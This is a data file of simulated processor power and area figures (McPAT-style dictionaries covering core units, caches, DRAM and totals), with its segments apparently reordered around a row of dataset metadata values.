'Instruction Fetch Unit/Runtime Dynamic': 0.388242,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0398899,
'L2/Runtime Dynamic': 0.0110088,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.61893,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.15718,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0770573,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0770572,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.98281,
'Load Store Unit/Runtime Dynamic': 1.61425,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.19001,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.38002,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0674352,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0680181,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.223279,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0228233,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.49523,
'Memory Management Unit/Runtime Dynamic': 0.0908414,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.1936,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.308764,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.012299,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0906719,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.411735,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.47859,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.144,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.315792,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.828175,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.300609,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.484871,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.244747,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.03023,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.216839,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.67756,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.15646,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0126089,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.143035,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0932505,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.299495,
'Execution Unit/Register Files/Runtime Dynamic': 0.105859,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.337343,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.759655,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.61691,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000561368,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000561368,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000492564,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000192656,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00133955,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00295485,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00525326,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0896441,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.70213,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.185252,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.304472,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.19738,
'Instruction Fetch Unit/Runtime Dynamic': 0.587575,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0331415,
'L2/Runtime Dynamic': 0.00690054,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.74011,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.20486,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0809777,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0809777,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.1225,
'Load Store Unit/Runtime Dynamic': 1.6852,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.199677,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.399355,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0708661,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0713609,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.354538,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0303777,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.632382,
'Memory Management Unit/Runtime Dynamic': 0.101739,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 22.2524,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.411575,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0185714,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.145597,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.575743,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.57406,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 3.8525058798762615,
'Runtime Dynamic': 3.8525058798762615,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.210089,
'Runtime Dynamic': 0.065201,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 81.4839,
'Peak Power': 114.596,
'Runtime Dynamic': 18.7807,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 81.2738,
'Total Cores/Runtime Dynamic': 18.7155,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.210089,
'Total L3s/Runtime Dynamic': 0.065201,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}} | 75.077681 | 124 | 0.682022 | power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 5.66814e-06,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202693,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 2.02403e-05,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.369616,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.64004,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.367081,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.37674,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.365347,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.59398,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 3.82383e-06,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0133989,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0968933,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0990927,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0968971,
'Execution Unit/Register Files/Runtime Dynamic': 0.112492,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.234135,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.601487,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.69879,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00417854,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00417854,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00365895,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00142708,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00142347,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
